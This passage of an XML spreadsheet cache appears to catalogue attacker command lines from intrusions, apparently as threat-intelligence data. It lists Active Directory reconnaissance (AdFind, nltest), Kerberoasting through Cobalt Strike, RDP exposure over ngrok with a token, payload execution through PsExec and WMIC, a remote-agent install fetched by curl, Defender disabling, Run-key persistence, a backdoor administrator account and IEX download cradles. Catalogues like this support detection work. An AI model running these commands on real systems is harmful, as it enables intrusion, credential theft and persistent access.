    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0278"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; &gt; ad_ous.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0279"/>
    <m/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp &gt; trustdmp.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0280"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot; &gt; ad_group.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0281"/>
    <m/>
    <m/>
    <s v="adfind.exe -f objectcategory = computer -csv name cn OperatingSystem dNSHostName&gt; some.csv"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0282"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; &gt; ad_computers.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0283"/>
    <m/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)&gt; subnets.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0284"/>
    <m/>
    <m/>
    <s v="psinject 4728 x86 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -encoding UTF8 (Cobalt Strike command)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0285"/>
    <m/>
    <m/>
    <s v="psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt &gt;&gt; C:\ProgramData\out.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0286"/>
    <m/>
    <m/>
    <s v="Invoke-UserHunter"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0287"/>
    <m/>
    <m/>
    <s v="Invoke-ShareFinder"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0288"/>
    <m/>
    <m/>
    <s v="psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt (Cobalt Strike command)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0289"/>
    <m/>
    <m/>
    <s v="ngrok authtoken1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0290"/>
    <m/>
    <m/>
    <s v="ngrok tcp 3389"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0291"/>
    <m/>
    <m/>
    <s v="start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY &quot;\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe&quot; &quot;C:\windows\temp&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0292"/>
    <m/>
    <m/>
    <s v="PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0293"/>
    <m/>
    <m/>
    <s v="curl -o setup.msi &quot;http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&amp;integratorLogin=REDACTED%40protonmail.com&quot; &amp;&amp; msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0294"/>
    <m/>
    <m/>
    <s v="shell setup_undefined.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0295"/>
    <m/>
    <m/>
    <s v="MSBuild Install Atera Agent "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0296"/>
    <m/>
    <m/>
    <s v="shell setup_undefined.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0297"/>
    <m/>
    <m/>
    <s v="reg add &quot;HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist&quot; /v oldadministrator /t REG_DWORD /d 0 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0298"/>
    <m/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0299"/>
    <m/>
    <m/>
    <s v="reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 0 /f &amp;&amp;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="procc-eid0300"/>
    <m/>
    <m/>
    <s v="WMIC /node:&quot;DC.example.domain&quot; process call create &quot;rundll32 C:\PerfLogs\arti64.dll, StartW&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0301"/>
    <m/>
    <m/>
    <s v="powershell -nop -exec bypass -EncodedCommand"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0302"/>
    <m/>
    <m/>
    <s v="Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0303"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0304"/>
    <m/>
    <m/>
    <s v="net group &quot;Domain admins&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0305"/>
    <m/>
    <m/>
    <s v="ping hostname.domain.local"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0306"/>
    <m/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0307"/>
    <m/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0308"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0309"/>
    <m/>
    <m/>
    <s v="net group &quot;Domain admins&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0310"/>
    <m/>
    <m/>
    <s v="net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0311"/>
    <m/>
    <m/>
    <s v="cmd.exe /C reg query HKLM\System\CurrentControlSet\Control\Lsa\Kerbberos\Parameters"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0312"/>
    <m/>
    <m/>
    <s v="nltest /dclist:"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0313"/>
    <m/>
    <m/>
    <s v="Invoke-CheckLocalAdminAccess"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0314"/>
    <m/>
    <m/>
    <s v="Get-NetComputer -operatingsystem *server*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0315"/>
    <m/>
    <m/>
    <s v="Get-NetSubnet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0316"/>
    <m/>
    <m/>
    <s v="Find-LocalAdminAccess"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0317"/>
    <m/>
    <m/>
    <s v="WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0318"/>
    <m/>
    <m/>
    <s v="Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0319"/>
    <m/>
    <m/>
    <s v="WMIC /node:\&quot;DC.example.domain\&quot; process call create \&quot;rundll32 C:\\PerfLogs\\arti64.dll, StartW\&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0320"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C dir \\Server\c$"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="procc-eid0321"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C rundll32 C:\Windows\system32\SQL.dll, StartW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0322"/>
    <m/>
    <m/>
    <s v="rundll32 C:\PerfLogs\arti64.dll, rundll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0323"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0324"/>
    <m/>
    <m/>
    <s v="nltest /dclist:DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0325"/>
    <m/>
    <m/>
    <s v="net group &quot;Domain admins&quot; /DOMAIN"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0326"/>
    <m/>
    <m/>
    <s v="net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0327"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0328"/>
    <m/>
    <m/>
    <s v="nltest /dclist:&quot;DOMAIN&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0329"/>
    <m/>
    <m/>
    <s v="ping DOMAINCONTROLLER"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0330"/>
    <m/>
    <m/>
    <s v="cmd.exe /C time"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0331"/>
    <m/>
    <m/>
    <s v="net user administrator /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0332"/>
    <m/>
    <m/>
    <s v="powershell -nop -exec bypass -EncodedCommand"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0333"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0334"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0335"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0336"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0337"/>
    <m/>
    <m/>
    <s v="adfind.exe -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0338"/>
    <m/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0339"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0340"/>
    <m/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0341"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0342"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C WMIC/node:&quot;DC.DOMAIN.local&quot; process call create &quot;cmd /c C:\PerfLogs\servisess.exe\&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0343"/>
    <m/>
    <m/>
    <s v="mmc.exe&quot; &quot;C:\Windows\System32\gpedit.msc&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0344"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /c echo 92d8cc45954 &gt;; \\.\pipe\446b3c"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="procc-eid0345"/>
    <m/>
    <m/>
    <s v="rundll32.exe C:\Users\USER\AppData\Local\Temp\BA6b.tmp.dll, StartW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0346"/>
    <m/>
    <m/>
    <s v="cmd.exe /c reg.exe add HKCU\\Software\Microsoft\Windows\CurrentVersion\Run /f /v T4QJ4U39BI1 /t REG_SZ /d &quot; &quot;C:\Users\User\Appdata\Local\Temp\M1E1626.exe\ &quot;U3wtv&quot; $amp; start &quot;H&quot; &quot;C:\Users\user\Appdata\Local\Temp\M1E1626.exe&quot; U3WTV3"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0347"/>
    <m/>
    <m/>
    <s v="cmd.exe /c echo a3fed5b3a32 &gt; \\.\pipe\3406c2"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0348"/>
    <m/>
    <m/>
    <s v="cmd.exe /c nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0349"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0350"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0351"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35806/'); Find-LocalAdminAccess"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0352"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:35585/'); Get-NetComputer -ping -operatingsystem *server*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0353"/>
    <m/>
    <m/>
    <s v="IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:23163/'); Get-NetSubnet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0354"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0355"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C ping HOST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0356"/>
    <m/>
    <m/>
    <s v="Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select DNSHostName, IPv4Address, OperatingSystem, LastLogonDate"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0357"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0358"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C time"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0359"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C C:\Windows\Temp\adf\adf.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0360"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0361"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0362"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0363"/>
    <m/>
    <m/>
    <s v="adfind.exe -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0364"/>
    <m/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0365"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0366"/>
    <m/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="procc-eid0367"/>
    <m/>
    <m/>
    <s v="rundll32.exe &quot;C:\Users\REDACTED\AppData\Local\Temp\rate_x32.dat&quot;,update /i:&quot;LaborBetray\license.dat&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0368"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0369"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0370"/>
    <m/>
    <m/>
    <s v="whoami /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0371"/>
    <m/>
    <m/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0372"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0373"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts  /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0374"/>
    <m/>
    <m/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0375"/>
    <m/>
    <m/>
    <s v="net view /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0376"/>
    <m/>
    <m/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0377"/>
    <m/>
    <m/>
    <s v="cmd.exe /C dsquery subnet -limit 0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0378"/>
    <m/>
    <m/>
    <s v="cmd.exe /C reg add &quot;hklm\system\currentControlSet\Control\Terminal Server&quot; /v &quot;fDenyTSConnections&quot; /t REG_DWORD /d 0x0 /f "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0379"/>
    <m/>
    <m/>
    <s v="cmd.exe /C netsh firewall set service type = remotedesktop mode = enable"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0380"/>
    <m/>
    <m/>
    <s v="cmd.exe /C netsh firewall set rule group=&quot;remote desktop&quot; new enable=Yes "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0381"/>
    <m/>
    <m/>
    <s v="cmd.exe /C netsh advfirewall set rule group=&quot;remote desktop&quot; new enable=Yes "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0382"/>
    <m/>
    <m/>
    <s v="cmd.exe /C copy 192145.dll \\&lt;INTERNAL_IP&gt;\ADMIN$ /Y /Z "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0383"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -d -s \\&lt;INTERNAL_IP&gt; rundll32.exe C:\windows\192145.dll,StartW "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0384"/>
    <m/>
    <m/>
    <s v="net user /add /Y nuuser 7HeC00l3stP@ssw0rd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0385"/>
    <m/>
    <m/>
    <s v="net localgroup administrators nuuser /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0386"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0387"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0388"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="whoami /groups"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0389"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="net config workstation"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0390"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
